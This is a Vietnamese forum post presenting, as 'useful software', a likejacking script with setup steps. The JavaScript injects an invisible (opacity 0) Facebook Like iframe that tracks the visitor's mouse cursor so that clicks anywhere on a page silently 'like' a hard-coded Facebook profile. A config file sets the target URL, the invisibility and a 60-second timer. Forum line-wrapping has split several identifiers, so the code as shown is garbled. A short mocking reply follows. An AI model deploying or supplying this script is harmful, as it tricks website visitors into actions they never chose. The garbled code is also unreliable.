Phần mềm hữu ích với Internet
By codon_motvisao4899
#695035 -Đầu tiên ( bước quan trọng nhất ):Đăng nhập đi

- like fanpage nè đã : Bấm vào đây để đăng nhập và xem link!

xong giờ mình hướng dẫn đây...

1. Tạo cho mình 2 notepad

2. copy toan bộ đoạn code dưới đây vào notepad đâu tiên

if((document.getElementById)&&window.addEventListe ner||window.attachEvent){(function(){var hairCol="#ff0000";var d=document;var my=-10;var mx=-10;var r;var vert="";var idx=document.getElementsByTagName('div').length;va r thehairs="<iframe id='theiframe' scrolling='no' frameBorder='0' allowTransparency='true' src='http://www.facebook.com/widgets/like.php?href="+ encodeURIComponent(fan_page_url)+"&amp;layout=stan dard&amp;show_faces=true&amp;width=53&amp;action=l ike&amp;colorscheme=light&amp;height=80' style='position:absolute;width:53px;height:23px;ov erflow:hidden;border:0;opacity:"+ opacity+";filter:alpha(opacity="+ opacity*100+");'></iframe>";document.write(thehairs);var like=document.getElementById("theiframe");document .getElementsByTagName('body')[0].appendChild(like);var pix="px";var domWw=(typeof window.innerWidth=="number");var domSy=(typeof window.pageYOffset=="number");if(domWw)

r=window;else{if(d.documentElement&&typeof d.documentElement.clientWidth=="number"&&d.documen tElement.clientWidth!=0)

r=d.documentElement;else{if(d.body&&typeof d.body.clientWidth=="number")

r=d.body;}}

if(time!=0){setTimeout(function(){document.getElem entsByTagName('body')[0].removeChild(like);if(window.addEventListener){doc ument.removeEventListener("mousemove",mouse,false) ;}

else if(window.attachEvent){document.detachEvent("onmou semove",mouse);}},time);}

function scrl(yx){var y,x;if(domSy){y=r.pageYOffset;x=r.pageXOffset;}

else{y=r.scrollTop;x=r.scrollLeft;}

return(yx==0)?y:x;}

function mouse(e){var msy=(domSy)?window.pageYOffset:0;if(!e)

e=window.event;if(typeof e.pageY=='number'){my=e.pageY- 5- msy;mx=e.pageX- 4;}

else{my=e.clientY- 6- msy;mx=e.clientX- 6;}

vert.top=my+ scrl(0)+ pix;vert.left=mx+ pix;}

function ani(){vert.top=my+ scrl(0)+ pix;setTimeout(ani,300);}

function init(){vert=document.getElementById("theiframe").s tyle;ani();}

if(window.addEventListener){window.addEventListene r("load",init,false);document.addEventListener("mo usemove",mouse,false);}

else if(window.attachEvent){window.attachEvent("onload" ,init);document.attachEvent("onmousemove",mouse);} })();}copy xong thay tên note đấy là like- copy đoạn nè vào notepad thứ 2

var fan_page_url='https://www.facebook.com/hoanganh.bui.524'

var opacity=0;var time=60000;


xong thay tên là config

3. xong thì chỉ việc up 2 file đó lên host web của bạn thôi... mấy cái kia mình chỉnh hết rồi nên đừng sửa gì cả

Lưu ý khi sử dụng

- Gặp Link download hỏng, hãy đăng trả lời (yêu cầu link download mới), Các MOD sẽ cập nhật link sớm nhất
- Tìm kiếm trước khi đăng bài mới

Chủ đề liên quan:
By vietphuong151024
By nguyetdang1610
#695043 xin phép cho em đút cơm cho thèn này nó ăn phát, chắc nó học ở nhà trẻ Phương Anh nên lớn lên mới bị thế này, tội thiệt
Kết nối đề xuất:
Learn Synonym
Advertisement